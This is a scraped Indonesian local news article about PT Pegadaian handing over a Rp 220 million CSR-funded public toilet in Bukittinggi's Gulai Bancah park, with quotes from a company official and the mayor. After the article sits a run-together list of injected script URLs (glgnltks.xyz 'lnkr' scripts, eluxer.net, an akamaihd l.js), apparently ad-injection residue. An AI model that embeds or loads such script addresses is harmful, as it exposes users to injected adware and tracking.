Ruang Publik

Manfaatkan Dana CSR,, PT Pegadaian Bantu Bangun WC Umum di Bukittinggi

HaloBukittinggi : WC umum yang di bangun oleh PT Pegadaian melalui dana Coorporate Social Responsibility (CSR) sebesar Rp 220 juta, yang berlokasi di Taman Kota Depan Makam Pahlawan Kusuma Bhakti Gulai Bancah Bukittinggi telah diserahkaan secara resmi kepada Pemerintah Kota Bukittinggi.

Pimpinan Wilayah II Pegadaian, Afrimon, mengatakan, BUMN tidak hanya pegadaian saja yang dituntut  mempunyai program CSR, karena seluruh BUMN yang beroperasi di Sumatera Barat sama-sama menjalankan tugas dari Kementrian BUMN, untuk membuat program yang dapat membantu dan mensport Pariwisata di Sumatera Barat, termasuk di Kota Bukittinggi.

“Maka dari itu PT Pegadaian berinisiatif menjalankan program pembangunan, selain bermanfaat bagi masyarakat, juga akan membantu Kota Bukittinggi meningkatkan perannya dalam dunia kepariwisataan,” ujarnya.

Setelah berkomunikasi dengan Pemerintah Kota Bukittinggi sambung Afrimon, akhirnya PT Pegadaian mengusulkan program pembangunan WC umum di taman taman kota atau ditempat tempat Wisata salah satunya di Taman Kota Gulai Bancah, dimana pembangunan WC ini dilakukan dalam waktu 2 bulan dengan menelan biaya sebesar Rp 220 juta.

“Dengan CSR ini harapan kita kedepan PT Pegadaian semakin dikenal masyarakat dengan program-programnya yang saat ini tidak hanya sebagai lembaga pembiayaan dengan basis gadai, tetapi sudah menjadi lembaga serba bisa, dengan pelayanan yang maksimal pada masyarakat,” tukasnya.

Pada kesempatan yang sama, Wali Kota Bukittinggi M. Ramlan Nurmatias mengucapkan terimaksih kepada PT Pegadaian yang telah membangun WC umum di Taman Kota Gulai Bancah itu melalui dana CSR nya, karena program itu telah membantu Pemko Bukittinggi dalam pengadaan WC umum yang refresentatif.

“Pemerintah Kota Bukittinggi tidak akan maksimal menjalankan pembangunan apabila hanya hanya dengan mengandalkan Dana Alokasi Umum (DAU) dan Dana Alokasi Khusus (DAK) semata, maka dari itu dibutuhkan juga bantuan dari dana CSR BUMN yang ada di Kota Bukittinggi ini,” terangnya.

M. Ramlan Nurmatias berharap, semoga kedepan PT Pegadaian bertambah eksis lagi dengan program nya untuk membantu Pemko Bukittinggi melalui dana CSR, dan diharapkan juga agar PT Pegadaian menjalankan kegiatan-kegiatan yang berskala besar di Kota Bukittinggi, yang secara langsung akan meningkatkan kunjungan wisatawan. (Dipra)

https://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2449&ext=Advertisehttps://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2450&ext=Not%20sethttps://glgnltks.xyz/addons/lnkr5.min.jshttps://glgnltks.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51565_4460_https://glgnltks.xyz/ext/116c6de661dcbbd02f.js?sid=51565_4460_&title=Not%20set&blocks%5B%5D=1f755&blocks%5B%5D=4d09a

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Populer

Copyright © 2016 HaloBukittinggi

To Top